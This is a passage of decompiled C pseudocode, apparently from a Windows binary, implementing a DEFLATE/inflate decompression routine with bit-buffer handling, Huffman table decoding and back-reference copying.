                  											}
                  											__eflags = _t1364 - 8;
                  											if(_t1364 >= 8) {
                  												L324:
                  												_t1166 = _t1119 & 0x000000ff;
                  												_t1119 = _t1119 >> 8;
                  												_t1364 = _t1364 - 8;
                  												_v8 = _t1119;
                  												goto L329;
                  											}
                  											_t1288 = _v16;
                  											while(1) {
                  												L322:
                  												__eflags = _t1288 - _v36;
                  												if(_t1288 >= _v36) {
                  													break;
                  												}
                  												_t828 = ( *_t1288 & 0x000000ff) << _t1364;
                  												_t1288 = _t1288 + 1;
                  												_t1119 = _t1119 | _t828;
                  												_v16 = _t1288;
                  												_t1364 = _t1364 + 8;
                  												_v8 = _t1119;
                  												__eflags = _t1364 - 8;
                  												if(_t1364 < 8) {
                  													continue;
                  												}
                  												goto L324;
                  											}
                  											 *_t1350 = 0x29;
                  											goto L335;
                  										} else {
                  											goto L312;
                  										}
                  										while(1) {
                  											L312:
                  											__eflags = _t1364 - 8;
                  											if(_t1364 < 8) {
                  												break;
                  											}
                  											_t1288 = _t1288 - 1;
                  											_t1364 = _t1364 - 8;
                  											__eflags = _t1288 - _t822;
                  											if(_t1288 > _t822) {
                  												continue;
                  											}
                  											break;
                  										}
                  										_v16 = _t1288;
                  										goto L315;
                  									} else {
                  										goto L306;
                  									}
                  									while(1) {
                  										L306:
                  										__eflags = _t1288 - _v36;
                  										if(_t1288 >= _v36) {
                  											break;
                  										}
                  										_t1169 = _t1364;
                  										_t1364 = _t1364 + 8;
                  										_t830 = ( *_t1288 & 0x000000ff) << _t1169;
                  										_t1288 = _t1288 + 1;
                  										_t1117 = _v8 | _t830;
                  										_v16 = _t1288;
                  										_v8 = _t1117;
                  										__eflags = _t1364 - (_t1364 & 0x00000007);
                  										if(_t1364 < (_t1364 & 0x00000007)) {
                  											continue;
                  										}
                  										goto L311;
                  									}
                  									 *_t1350 = 0x20;
                  									goto L335;
                  								}
                  								L63:
                  								_t1170 = _v8;
                  								L66:
                  								__eflags = _t1364 - 3;
                  								if(_t1364 < 3) {
                  									L64:
                  									__eflags = _t1288 - _v36;
                  									if(_t1288 >= _v36) {
                  										 *_t1350 = 3;
                  										goto L335;
                  									}
                  									_t834 = ( *_t1288 & 0x000000ff) << _t1364;
                  									_t1288 = _t1288 + 1;
                  									_t1170 = _v8 | _t834;
                  									_v16 = _t1288;
                  									_v8 = _t1170;
                  									_t1364 = _t1364 + 8;
                  									__eflags = _t1364;
                  									goto L66;
                  								}
                  								_t1364 = _t1364 - 3;
                  								_t836 = _t1170 & 0x00000007;
                  								_t1350[5] = _t836;
                  								_t837 = _t836 >> 1;
                  								__eflags = _t837;
                  								_v8 = _t1170 >> 3;
                  								_v48 = _t1364;
                  								_t1350[6] = _t837;
                  								if(_t837 == 0) {
                  									L253:
                  									__eflags = _t1364 - (_t1364 & 0x00000007);
                  									if(_t1364 < (_t1364 & 0x00000007)) {
                  										L251:
                  										__eflags = _t1288 - _v36;
                  										if(_t1288 >= _v36) {
                  											 *_t1350 = 5;
                  											goto L335;
                  										}
                  										_t841 = ( *_t1288 & 0x000000ff) << _t1364;
                  										_t1288 = _t1288 + 1;
                  										_v8 = _v8 | _t841;
                  										_t1364 = _t1364 + 8;
                  										__eflags = _t1364;
                  										_v16 = _t1288;
                  										goto L253;
                  									}
                  									_t1176 = _t1364 & 0x00000007;
                  									_t843 = _v8 >> _t1176;
                  									_t1364 = _t1364 - _t1176;
                  									_v8 = _t843;
                  									_t1177 = 0;
                  									__eflags = 0;
                  									_v48 = _t1364;
                  									L255:
                  									_v12 = _t1177;
                  									__eflags = _t1177 - 4;
                  									if(_t1177 >= 4) {
                  										_v12 = (_t1350[0xa48] & 0x000000ff) << 0x00000008 | _t1350[0xa48] & 0x000000ff;
                  										_t819 = _v12;
                  										__eflags = _t819 - (((_t1350[0xa48] & 0x000000ff) << 0x00000008 | _t1350[0xa48] & 0x000000ff) ^ 0x0000ffff);
                  										if(_t819 != (((_t1350[0xa48] & 0x000000ff) << 0x00000008 | _t1350[0xa48] & 0x000000ff) ^ 0x0000ffff)) {
                  											L304:
                  											_v20 = _t1113;
                  											 *_t1350 = 0x27;
                  											goto L339;
                  										}
                  										_t1139 = _v32;
                  										L267:
                  										__eflags = _t819;
                  										if(_t819 == 0) {
                  											goto L62;
                  										}
                  										__eflags = _t1364;
                  										if(_t1364 == 0) {
                  											goto L61;
                  										}
                  										__eflags = _t1364 - 8;
                  										if(_t1364 >= 8) {
                  											_t1185 = _v8;
                  											L274:
                  											_t846 = _t1185 & 0x000000ff;
                  											_t1364 = _t1364 - 8;
                  											_v44 = _t846;
                  											_v8 = _t1185 >> 8;
                  											_v48 = _t1364;
                  											L276:
                  											_t1187 = _v32;
                  											__eflags = _t1187 - _v60;
                  											if(_t1187 >= _v60) {
                  												_t1113 = 2;
                  												_v20 = _t1113;
                  												 *_t1350 = 0x34;
                  												goto L339;
                  											}
                  											 *_t1187 = _t846;
                  											_t1139 =  &(_t1187[0]);
                  											_t819 = _v12 - 1;
                  											_v32 = _t1139;
                  											_v12 = _t819;
                  											goto L267;
                  										} else {
                  											goto L270;
                  										}
                  										while(1) {
                  											L270:
                  											__eflags = _t1288 - _v36;
                  											if(_t1288 >= _v36) {
                  												break;
                  											}
                  											_t849 = ( *_t1288 & 0x000000ff) << _t1364;
                  											_t1288 = _t1288 + 1;
                  											_t1364 = _t1364 + 8;
                  											_t1185 = _v8 | _t849;
                  											_v16 = _t1288;
                  											_v8 = _t1185;
                  											__eflags = _t1364 - 8;
                  											if(_t1364 < 8) {
                  												continue;
                  											}
                  											goto L274;
                  										}
                  										 *_t1350 = 0x33;
                  										goto L335;
                  									}
                  									__eflags = _t1364;
                  									if(_t1364 == 0) {
                  										L262:
                  										__eflags = _t1288 - _v36;
                  										if(_t1288 >= _v36) {
                  											 *_t1350 = 7;
                  											goto L335;
                  										}
                  										_t850 =  *_t1288;
                  										_t1288 = _t1288 + 1;
                  										__eflags = _t1288;
                  										 *(_t1177 +  &(_t1350[0xa48])) = _t850;
                  										_t843 = _v8;
                  										_v16 = _t1288;
                  										L264:
                  										_t1177 = _t1177 + 1;
                  										goto L255;
                  									}
                  									__eflags = _t1364 - 8;
                  									if(_t1364 >= 8) {
                  										L261:
                  										 *(_t1177 +  &(_t1350[0xa48])) = _t843;
                  										_t843 = _t843 >> 8;
                  										_t1364 = _t1364 - 8;
                  										_v8 = _t843;
                  										_v48 = _t1364;
                  										goto L264;
                  									} else {
                  										goto L258;
                  									}
                  									while(1) {
                  										L258:
                  										__eflags = _t1288 - _v36;
                  										if(_t1288 >= _v36) {
                  											break;
                  										}
                  										_t852 = ( *_t1288 & 0x000000ff) << _t1364;
                  										_t1288 = _t1288 + 1;
                  										_v8 = _v8 | _t852;
                  										_t1364 = _t1364 + 8;
                  										_v16 = _t1288;
                  										__eflags = _t1364 - 8;
                  										if(_t1364 < 8) {
                  											continue;
                  										}
                  										_t1177 = _v12;
                  										_t843 = _v8;
                  										goto L261;
                  									}
                  									 *_t1350 = 6;
                  									goto L335;
                  								}
                  								__eflags = _t837 - 3;
                  								if(_t837 == 3) {
                  									L298:
                  									_v20 = _t1113;
                  									 *_t1350 = 0xa;
                  									goto L339;
                  								}
                  								__eflags = _t837 - _v24;
                  								if(_t837 != _v24) {
                  									_t1191 = 0;
                  									__eflags = 0;
                  									L72:
                  									_v12 = _t1191;
                  									__eflags = _t1191 - 3;
                  									if(_t1191 < 3) {
                  										L83:
                  										_t146 = _t1191 + 0x411014; // 0x40505
                  										_t853 =  *_t146;
                  										_v28 = _t853;
                  										__eflags = _t1364 - _t853;
                  										if(_t1364 < _t853) {
                  											L81:
                  											__eflags = _t1288 - _v36;
                  											if(_t1288 >= _v36) {
                  												 *_t1350 = 0xb;
                  												goto L335;
                  											}
                  											_t855 = ( *_t1288 & 0x000000ff) << _t1364;
                  											_t1288 = _t1288 + 1;
                  											_v8 = _v8 | _t855;
                  											_t1364 = _t1364 + 8;
                  											__eflags = _t1364;
                  											_t1191 = _v12;
                  											_v16 = _t1288;
                  											goto L83;
                  										}
                  										_t1302 =  &(_t1350[_t1191]);
                  										_t1302[0xb] = (_v24 << _v28) - 0x00000001 & _v8;
                  										_t155 = _v12 + 0x411014; // 0x40505
                  										_t1194 =  *_t155;
                  										_v8 = _v8 >> _t1194;
                  										_t1364 = _t1364 - _t1194;
                  										_t1195 = _v12;
                  										_v48 = _t1364;
                  										_t1302[0xb] = _t1302[0xb] +  *((intOrPtr*)(0x411a48 + _t1195 * 4));
                  										_t1191 = _t1195 + 1;
                  										_t1288 = _v16;
                  										goto L72;
                  									}
                  									memset( &(_t1350[0x6e0]), 0, 0x120);
                  									_t1303 = _v8;
                  									_t1379 = _t1379 + 0xc;
                  									_t864 = 0;
                  									__eflags = 0;
                  									L74:
                  									_v12 = _t864;
                  									__eflags = _t864 - _t1350[0xd];
                  									if(_t864 >= _t1350[0xd]) {
                  										_t1350[0xd] = 0x13;
                  										L86:
                  										_t865 = _t1350[6];
                  										__eflags = _t865;
                  										if(_t865 < 0) {
                  											L153:
                  											_t1288 = _v16;
                  											L154:
                  											_t1197 = _v36 - _t1288;
                  											__eflags = _t1197 - 4;
                  											if(_t1197 < 4) {
                  												L173:
                  												__eflags = _t1364 - 0xf;
                  												if(_t1364 >= 0xf) {
                  													L178:
                  													_t1198 = _v8;
                  													L179:
                  													_t868 =  *((short*)(_t1350 + 0x160 + (_t1198 & 0x000003ff) * 2));
                  													_v12 = _t868;
                  													__eflags = _t868;
                  													if(_t868 < 0) {
                  														_t1199 = 0xa;
                  														do {
                  															_v12 =  !_v12;
                  															_t872 = (_v8 >> _t1199 & 0x00000001) + _v12;
                  															_t1199 = _t1199 + 1;
                  															_t873 =  *((short*)(_t1350 + 0x960 + _t872 * 2));
                  															_v12 = _t873;
                  															__eflags = _t873;
                  														} while (_t873 < 0);
                  														L191:
                  														_v8 = _v8 >> _t1199;
                  														_t1364 = _t1364 - _t1199;
                  														__eflags = _t873 - 0x100;
                  														if(_t873 >= 0x100) {
                  															L198:
                  															_t874 = _t873 & 0x000001ff;
                  															_v12 = _t874;
                  															__eflags = _t874 - 0x100;
                  															if(_t874 == 0x100) {
                  																goto L62;
                  															}
                  															_t875 = _t874 * 4 - 0x404;
                  															_t1200 =  *(_t875 + 0x411020);
                  															_v56 = _t1200;
                  															_v12 =  *((intOrPtr*)(_t875 + 0x411a58));
                  															__eflags = _t1200;
                  															if(_t1200 == 0) {
                  																L205:
                  																__eflags = _t1364 - 0xf;
                  																if(_t1364 >= 0xf) {
                  																	L210:
                  																	_t1201 = _v8;
                  																	L211:
                  																	_t879 =  *((short*)(_t1350 + 0xf00 + (_t1201 & 0x000003ff) * 2));
                  																	_v28 = _t879;
                  																	__eflags = _t879;
                  																	if(_t879 < 0) {
                  																		_t1121 = _v28;
                  																		_t1321 = _v8;
                  																		_t1202 = 0xa;
                  																		do {
                  																			_t883 = (_t1321 >> _t1202 & 0x00000001) +  !_t1121;
                  																			_t1202 = _t1202 + 1;
                  																			_t1121 =  *((short*)(_t1350 + 0x1700 + _t883 * 2));
                  																			__eflags = _t1121;
                  																		} while (_t1121 < 0);
                  																		_t1288 = _v16;
                  																		_v28 = _t1121;
                  																		_t1113 = _t1121 | 0xffffffff;
                  																		__eflags = _t1113;
                  																		_t884 = _v28;
                  																		L224:
                  																		_v8 = _v8 >> _t1202;
                  																		_t1364 = _t1364 - _t1202;
                  																		_t1203 =  *(0x4110a0 + _t884 * 4);
                  																		_t885 =  *((intOrPtr*)(0x411120 + _t884 * 4));
                  																		_v56 = _t1203;
                  																		_v44 = _t885;
                  																		__eflags = _t1203;
                  																		if(_t1203 == 0) {
                  																			L230:
                  																			_t1205 = _v32 - _a8;
                  																			_v72 = _t1205;
                  																			__eflags = _t885 - _t1205;
                  																			if(_t885 <= _t1205) {
                  																				L232:
                  																				_t1350 = _v64;
                  																				_t1208 = (_t1205 - _t885 & _v68) + _a8;
                  																				__eflags = _v32 - _t1208;
                  																				_t887 = _v32 > _t1208 ? _v32 : _t1208;
                  																				_t888 = (_v32 > _t1208 ? _v32 : _t1208) + _v12;
                  																				__eflags = (_v32 > _t1208 ? _v32 : _t1208) + _v12 - _v60;
                  																				if((_v32 > _t1208 ? _v32 : _t1208) + _v12 <= _v60) {
                  																					_t889 = _v12;
                  																					__eflags = _t889 - 9;
                  																					if(_t889 < 9) {
                  																						L246:
                  																						_t1322 = _v32;
                  																						do {
                  																							_t890 =  *_t1208;
                  																							_t1208 = _t1208 + 3;
                  																							 *_t1322 = _t890;
                  																							 *((char*)(_t1322 + 1)) =  *((intOrPtr*)(_t1208 - 2));
                  																							 *((char*)(_t1322 + 2)) =  *((intOrPtr*)(_t1208 - 1));
                  																							_t1322 = _t1322 + 3;
                  																							_t894 = _v12 - 3;
                  																							_v12 = _t894;
                  																							__eflags = _t894 - 2;
                  																						} while (_t894 > 2);
                  																						_v32 = _t1322;
                  																						__eflags = _t894;
                  																						if(_t894 <= 0) {
                  																							goto L153;
                  																						}
                  																						 *_t1322 =  *_t1208;
                  																						_t934 = _v12;
                  																						__eflags = _t934 - 1;
                  																						if(_t934 <= 1) {
                  																							L245:
                  																							_v32 = _t1322 + _t934;
                  																							goto L153;
                  																						}
                  																						L244:
                  																						 *((char*)(_t1322 + 1)) =  *((intOrPtr*)(_t1208 + 1));
                  																						_t934 = _v12;
                  																						goto L245;
                  																					}
                  																					__eflags = _t889 - _v44;
                  																					if(_t889 > _v44) {
                  																						goto L246;
                  																					}
                  																					_t1126 = _v32;
                  																					_t1326 = (_t889 & 0xfffffff8) + _t1208;
                  																					__eflags = _t1326;
                  																					do {
                  																						 *_t1126 =  *_t1208;
                  																						_t937 =  *((intOrPtr*)(_t1208 + 4));
                  																						_t1208 = _t1208 + 8;
                  																						 *((intOrPtr*)(_t1126 + 4)) = _t937;
                  																						_t1126 = _t1126 + 8;
                  																						__eflags = _t1208 - _t1326;
                  																					} while (_t1208 < _t1326);
                  																					_t939 = _v12 & 0x00000007;
                  																					_v32 = _t1126;
                  																					_t1113 = _t1126 | 0xffffffff;
                  																					_v12 = _t939;
                  																					__eflags = _t939 - 3;
                  																					if(_t939 >= 3) {
                  																						goto L246;
                  																					}
                  																					__eflags = _t939;
                  																					if(_t939 == 0) {
                  																						goto L153;
                  																					}
                  																					_t1322 = _v32;
                  																					 *_t1322 =  *_t1208;
                  																					_t934 = _v12;
                  																					__eflags = _t934 - 1;
                  																					if(_t934 <= 1) {
                  																						goto L245;
                  																					}
                  																					goto L244;
                  																				}
                  																				_t1138 = _v12;
                  																				L234:
                  																				_t941 = _t1138;
                  																				_t1138 = _t1138 - 1;
                  																				_v12 = _t1138;
                  																				__eflags = _t941;
                  																				if(_t941 == 0) {
                  																					goto L153;
                  																				}
                  																				L235:
                  																				__eflags = _v32 - _v60;
                  																				if(_v32 >= _v60) {
                  																					_t1113 = 2;
                  																					_v20 = _t1113;
                  																					 *_t1350 = 0x35;
                  																					goto L339;
                  																				}
                  																				_v32 = _v32 + 1;
                  																				_v72 = _v72 + 1;
                  																				 *_v32 =  *((intOrPtr*)((_v72 - _v44 & _v68) + _a8));
                  																				_t1350 = _v64;
                  																				goto L234;
                  																			}
                  																			__eflags = _a20 & 0x00000004;
                  																			if((_a20 & 0x00000004) != 0) {
                  																				L296:
                  																				_v20 = _t1113;
                  																				 *_t1350 = 0x25;
                  																				goto L339;
                  																			}
                  																			goto L232;
                  																		}
                  																		L228:
                  																		__eflags = _t1364 - _t1203;
                  																		if(_t1364 < _t1203) {
                  																			L226:
                  																			__eflags = _t1288 - _v36;
                  																			if(_t1288 >= _v36) {
                  																				 *_t1350 = 0x1b;
                  																				goto L335;
                  																			}
                  																			_t948 = ( *_t1288 & 0x000000ff) << _t1364;
                  																			_t1288 = _t1288 + 1;
                  																			_v8 = _v8 | _t948;
                  																			_t1364 = _t1364 + 8;
                  																			__eflags = _t1364;
                  																			_t1203 = _v56;
                  																			_v16 = _t1288;
                  																			goto L228;
                  																		}
                  																		_t1364 = _t1364 - _t1203;
                  																		_v8 = _v8 >> _t1203;
                  																		_t534 =  &_v44;
                  																		 *_t534 = _v44 + ((_v24 << _t1203) - 0x00000001 & _v8);
                  																		__eflags =  *_t534;
                  																		_t885 = _v44;
                  																		goto L230;
                  																	}
                  																	_t1202 = _t879 >> 9;
                  																	_t884 = _t879 & 0x000001ff;
                  																	goto L224;
                  																}
                  																__eflags = _v36 - _t1288 - 2;
                  																if(_v36 - _t1288 >= 2) {
                  																	_t502 = _t1288 + 1; // 0x83c84d8d
                  																	_t1201 = _v8 | ( *_t502 & 0x000000ff) << _t1364 + 0x00000008 | ( *_v16 & 0x000000ff) << _t1364;
                  																	_t1288 = _v16 + 2;
                  																	_v8 = _t1201;
                  																	_v16 = _t1288;
                  																	_t1364 = _t1364 + 0x10;
                  																	goto L211;
                  																}
                  																L207:
                  																_t960 =  *((short*)(_t1350 + 0xf00 + (_v8 & 0x000003ff) * 2));
                  																_v40 = _t960;
                  																__eflags = _t960;
                  																if(_t960 < 0) {
                  																	__eflags = _t1364 - 0xa;
                  																	if(_t1364 <= 0xa) {
                  																		L217:
                  																		__eflags = _t1288 - _v36;
                  																		if(_t1288 >= _v36) {
                  																			 *_t1350 = 0x1a;
                  																			goto L335;
                  																		}
                  																		_t962 = ( *_t1288 & 0x000000ff) << _t1364;
                  																		_t1288 = _t1288 + 1;
                  																		_t1364 = _t1364 + 8;
                  																		_t1201 = _v8 | _t962;
                  																		_v16 = _t1288;
                  																		_v8 = _t1201;
                  																		__eflags = _t1364 - 0xf;
                  																		if(_t1364 < 0xf) {
                  																			goto L207;
                  																		}
                  																		goto L211;
                  																	}
                  																	_t1216 = 0xa;
                  																	_v28 = _t1216;
                  																	while(1) {
                  																		_t1219 =  *((short*)(_t1350 + 0x1700 + ((_v8 >> _t1216 & _v24) +  !_v40) * 2));
                  																		_t968 = _v28 + 1;
                  																		_v40 = _t1219;
                  																		_v28 = _t968;
                  																		__eflags = _t1219;
                  																		if(_t1219 >= 0) {
                  																			goto L210;
                  																		}
                  																		_t1216 = _v28;
                  																		__eflags = _t1364 - _t968 + 1;
                  																		if(_t1364 >= _t968 + 1) {
                  																			continue;
                  																		}
                  																		goto L217;
                  																	}
                  																	goto L210;
                  																}
                  																_t970 = _t960 >> 9;
                  																__eflags = _t970;
                  																if(_t970 == 0) {
                  																	goto L217;
                  																}
                  																__eflags = _t1364 - _t970;
                  																if(_t1364 < _t970) {
                  																	goto L217;
                  																}
                  																goto L210;
                  															}
                  															L203:
                  															__eflags = _t1364 - _t1200;
                  															if(_t1364 < _t1200) {
                  																L201:
                  																__eflags = _t1288 - _v36;
                  																if(_t1288 >= _v36) {
                  																	 *_t1350 = 0x19;
                  																	goto L335;
                  																}
                  																_t972 = ( *_t1288 & 0x000000ff) << _t1364;
                  																_t1288 = _t1288 + 1;
                  																_v8 = _v8 | _t972;
                  																_t1364 = _t1364 + 8;
                  																__eflags = _t1364;
                  																_t1200 = _v56;
                  																_v16 = _t1288;
                  																goto L203;
                  															}
                  															_t1364 = _t1364 - _t1200;
                  															_v8 = _v8 >> _t1200;
                  															_t474 =  &_v12;
                  															 *_t474 = _v12 + ((_v24 << _t1200) - 0x00000001 & _v8);
                  															__eflags =  *_t474;
                  															goto L205;
                  														}
                  														L194:
                  														_t1221 = _v32;
                  														__eflags = _t1221 - _v60;
                  														if(_t1221 >= _v60) {
                  															_t1113 = 2;
                  															_v20 = _t1113;
                  															 *_t1350 = 0x18;
                  															goto L339;
                  														}
                  														 *_t1221 = _t873;
                  														_t1222 =  &(_t1221[0]);
                  														__eflags = _t1222;
                  														L196:
                  														_v32 = _t1222;
                  														goto L154;
                  													}
                  													_t1199 = _t868 >> 9;
                  													_t873 = _t868 & 0x000001ff;
                  													_v12 = _t873;
                  													goto L191;
                  												}
                  												__eflags = _t1197 - 2;
                  												if(_t1197 >= 2) {
                  													_t1198 = _v8 | ( *(_t1288 + 1) & 0x000000ff) << _t1364 + 0x00000008 | ( *_v16 & 0x000000ff) << _t1364;
                  													_t1288 = _v16 + 2;
                  													_v8 = _t1198;
                  													_v16 = _t1288;
                  													_t1364 = _t1364 + 0x10;
                  													goto L179;
                  												}
                  												L175:
                  												_t900 =  *((short*)(_t1350 + 0x160 + (_v8 & 0x000003ff) * 2));
                  												_v40 = _t900;
                  												__eflags = _t900;
                  												if(_t900 < 0) {
                  													__eflags = _t1364 - 0xa;
                  													if(_t1364 <= 0xa) {
                  														L185:
                  														__eflags = _t1288 - _v36;
                  														if(_t1288 >= _v36) {
                  															 *_t1350 = 0x17;
                  															goto L335;
                  														}
                  														_t902 = ( *_t1288 & 0x000000ff) << _t1364;
                  														_t1288 = _t1288 + 1;
                  														_t1364 = _t1364 + 8;
                  														_t1198 = _v8 | _t902;
                  														_v16 = _t1288;
                  														_v8 = _t1198;
                  														__eflags = _t1364 - 0xf;
                  														if(_t1364 < 0xf) {
                  															goto L175;
                  														}
                  														goto L179;
                  													}
                  													_t1229 = 0xa;
                  													_v28 = _t1229;
                  													while(1) {
                  														_t1232 =  *((short*)(_t1350 + 0x960 + ((_v8 >> _t1229 & _v24) +  !_v40) * 2));
                  														_t908 = _v28 + 1;
                  														_v40 = _t1232;
                  														_v28 = _t908;
                  														__eflags = _t1232;
                  														if(_t1232 >= 0) {
                  															goto L178;
                  														}
                  														_t1229 = _v28;
                  														__eflags = _t1364 - _t908 + 1;
                  														if(_t1364 >= _t908 + 1) {
                  															continue;
                  														}
                  														goto L185;
                  													}
                  													goto L178;
                  												}
                  												_t910 = _t900 >> 9;
                  												__eflags = _t910;
                  												if(_t910 == 0) {
                  													goto L185;
                  												}
                  												__eflags = _t1364 - _t910;
                  												if(_t1364 < _t910) {
                  													goto L185;
                  												}
                  												goto L178;
                  											}
                  											_t1113 = 0xffffffff;
                  											__eflags = _v60 - _v32 - 2;
                  											if(_v60 - _v32 < 2) {
                  												goto L173;
                  											}
                  											__eflags = _t1364 - 0xf;
                  											if(_t1364 >= 0xf) {
                  												_t913 = _v8;
                  											} else {
                  												_t913 = _v8 | (( *(_t1288 + 1) & 0x000000ff) << 0x00000008 |  *_v16 & 0x000000ff) << _t1364;
                  												_t1288 = _v16 + 2;
                  												_v8 = _t913;
                  												_v16 = _t1288;
                  												_t1364 = _t1364 + 0x10;
                  											}
                  											_t915 =  *((short*)(_t1350 + 0x160 + (_t913 & 0x000003ff) * 2));
                  											_v12 = _t915;
                  											__eflags = _t915;
                  											if(_t915 < 0) {
                  												_t1233 = 0xa;
                  												do {
                  													_v12 =  !_v12;
                  													_t919 = (_v8 >> _t1233 & 0x00000001) + _v12;
                  													_t1233 = _t1233 + 1;
                  													_t873 =  *((short*)(_t1350 + 0x960 + _t919 * 2));
                  													_v12 = _t873;
                  													__eflags = _t873;
                  												} while (_t873 < 0);
                  												goto L163;
                  											} else {
                  												_t1233 = _t915 >> 9;
                  												L163:
                  												_v8 = _v8 >> _t1233;
                  												_t1364 = _t1364 - _t1233;
                  												__eflags = _t873 & 0x00000100;
                  												if((_t873 & 0x00000100) != 0) {
                  													goto L198;
                  												}
                  												__eflags = _t1364 - 0xf;
                  												if(_t1364 >= 0xf) {
                  													_t920 = _v8;
                  												} else {
                  													_t920 = _v8 | (( *(_t1288 + 1) & 0x000000ff) << 0x00000008 |  *_v16 & 0x000000ff) << _t1364;
                  													_t1288 = _v16 + 2;
                  													_v8 = _t920;
                  													_v16 = _t1288;
                  													_t1364 = _t1364 + 0x10;
                  												}
                  												_t922 =  *((short*)(_t1350 + 0x160 + (_t920 & 0x000003ff) * 2));
                  												_v28 = _t922;
                  												__eflags = _t922;
                  												if(_t922 < 0) {
                  													_t1234 = 0xa;
                  													_v40 = _t1234;
                  													do {
                  														_t926 = (_v8 >> _t1234 & _v24) +  !_v28;
                  														_t1234 = _v40 + 1;
                  														_v40 = _t1234;
                  														_t873 =  *((short*)(_t1350 + 0x960 + _t926 * 2));
                  														_v28 = _t873;
                  														__eflags = _t873;
                  													} while (_t873 < 0);
                  													goto L171;
                  												} else {
                  													_t1234 = _t922 >> 9;
                  													L171:
                  													_t1364 = _t1364 - _t1234;
                  													_v8 = _v8 >> _t1234;
                  													 *_v32 = _v12;
                  													_t1113 = 0xffffffff;
                  													__eflags = _t873 & 0x00000100;
                  													if((_t873 & 0x00000100) != 0) {
                  														_t456 =  &_v32;
                  														 *_t456 = _v32 + 1;
                  														__eflags =  *_t456;
                  														goto L198;
                  													}
                  													_t1239 = _v32;
                  													 *(_t1239 + 1) = _t873;
                  													_t1222 = _t1239 + 2;
                  													goto L196;
                  												}
                  											}
                  										}
                  										_v20 = 0x40 + _t865 * 0xda0 + _t1350;
                  										memset( &_v212, 0, 0x40);
                  										memset(_v20 + 0x120, 0, 0x800);
                  										memset(_v20 + 0x920, 0, 0x480);
                  										_t1304 = _t1350[6];
                  										_t1244 = 0;
                  										_t1379 = _t1379 + 0x24;
                  										__eflags =  *(_t1350 + 0x2c + _t1304 * 4);
                  										if( *(_t1350 + 0x2c + _t1304 * 4) <= 0) {
                  											L91:
                  											_v28 = _v28 & 0x00000000;
                  											_t1245 = 0;
                  											_v144 = _v144 & 0;
                  											_t189 =  &_v148;
                  											 *_t189 = _v148 & 0;
                  											__eflags =  *_t189;
                  											_t1305 = 4;
                  											do {
                  												_t988 =  *((intOrPtr*)(_t1378 + _t1305 - 0xd0));
                  												_v28 = _v28 + _t988;
                  												_t1245 = _t1245 + _t988 + _t1245 + _t988;
                  												 *((intOrPtr*)(_t1378 + _t1305 - 0x8c)) = _t1245;
                  												_t1305 = _t1305 + 4;
                  												__eflags = _t1305 - 0x3c;
                  											} while (_t1305 <= 0x3c);
                  											__eflags = _t1245 - 0x10000;
                  											if(_t1245 == 0x10000) {
                  												L95:
                  												_t989 = _t1350[6];
                  												_v52 = _v52 & 0x00000000;
                  												_v40 = _t1113;
                  												__eflags =  *(_t1350 + 0x2c + _t989 * 4);
                  												if( *(_t1350 + 0x2c + _t989 * 4) <= 0) {
                  													L117:
                  													__eflags = _t1350[6] - 2;
                  													if(_t1350[6] != 2) {
                  														L152:
                  														_t1350[6] = _t1350[6] - 1;
                  														goto L86;
                  													}
                  													_t1247 = 0;
                  													__eflags = 0;
                  													L119:
                  													_v12 = _t1247;
                  													__eflags = _t1247 - _t1350[0xc] + _t1350[0xb];
                  													if(_t1247 >= _t1350[0xc] + _t1350[0xb]) {
                  														__eflags = _t1350[0xc] + _t1350[0xb] - _t1247;
                  														if(_t1350[0xc] + _t1350[0xb] != _t1247) {
                  															_t1288 = _v16;
                  															L290:
                  															_v20 = _t1113;
                  															 *_t1350 = 0x15;
                  															goto L339;
                  														}
                  														memcpy( &(_t1350[0x10]),  &(_t1350[0xa49]), _t1350[0xb]);
                  														_t999 = _t1350[0xb] + 0x2924 + _t1350;
                  														__eflags = _t999;
                  														memcpy( &(_t1350[0x378]), _t999, _t1350[0xc]);
                  														_t1379 = _t1379 + 0x18;
                  														goto L152;
                  													}
                  													_t1288 = _v16;
                  													__eflags = _t1364 - 0xf;
                  													if(_t1364 >= 0xf) {
                  														L125:
                  														_t1248 = _v8;
                  														L126:
                  														_t1004 =  *((short*)(_t1350 + 0x1ca0 + (_t1248 & 0x000003ff) * 2));
                  														_v44 = _t1004;
                  														__eflags = _t1004;
                  														if(_t1004 < 0) {
                  															_t1249 = 0xa;
                  															do {
                  																_v44 =  !_v44;
                  																_t1008 = (_v8 >> _t1249 & 0x00000001) + _v44;
                  																_t1249 = _t1249 + 1;
                  																_t1009 =  *((short*)(_t1350 + 0x24a0 + _t1008 * 2));
                  																_v44 = _t1009;
                  																__eflags = _t1009;
                  															} while (_t1009 < 0);
                  															L138:
                  															_t1364 = _t1364 - _t1249;
                  															_t1011 = _v8 >> _t1249;
                  															_t1250 = _v44;
                  															_v8 = _t1011;
                  															_v48 = _t1364;
                  															__eflags = _t1250 - 0x10;
                  															if(__eflags >= 0) {
                  																if(__eflags != 0) {
                  																	L142:
                  																	_t1251 =  *((char*)(_t1250 +  &__imp__IsProcessorFeaturePresent));
                  																	_v56 = _t1251;
                  																	__eflags = _t1364 - _t1251;
                  																	if(_t1364 >= _t1251) {
                  																		L146:
                  																		_t1364 = _t1364 - _t1251;
                  																		_v48 = _t1364;
                  																		_t1252 = _v44;
                  																		_v8 = _t1011 >> _t1251;
                  																		_t336 = _t1252 + 0x411008; // 0x0
                  																		_t1310 = ((_v24 << _t1251) - 0x00000001 & _t1011) +  *_t336;
                  																		_t1014 = _v12;
                  																		_v52 = _t1310;
                  																		__eflags = _v44 - 0x10;
                  																		if(_v44 != 0x10) {
                  																			_t1253 = 0;
                  																			__eflags = 0;
                  																		} else {
                  																			_t1253 =  *(_t1014 +  &(_t1350[0xa48])) & 0x000000ff;
                  																		}
                  																		memset(_t1014 + 0x2924 + _t1350, _t1253, _t1310);
                  																		_t1379 = _t1379 + 0xc;
                  																		_t1247 = _v12 + _v52;
                  																		goto L119;
                  																	} else {
                  																		goto L143;
                  																	}
                  																	while(1) {
                  																		L143:
                  																		__eflags = _t1288 - _v36;
                  																		if(_t1288 >= _v36) {
                  																			break;
                  																		}
                  																		_t1019 = ( *_t1288 & 0x000000ff) << _t1364;
                  																		_t1288 = _t1288 + 1;
                  																		_v8 = _v8 | _t1019;
                  																		_t1364 = _t1364 + 8;
                  																		_t1251 = _v56;
                  																		_v16 = _t1288;
                  																		__eflags = _t1364 - _t1251;
                  																		if(_t1364 < _t1251) {
                  																			continue;
                  																		}
                  																		_t1011 = _v8;
                  																		goto L146;
                  																	}
                  																	 *_t1350 = 0x12;
                  																	goto L335;
                  																}
                  																__eflags = _v12;
                  																if(_v12 == 0) {
                  																	L287:
                  																	_v20 = _t1113;
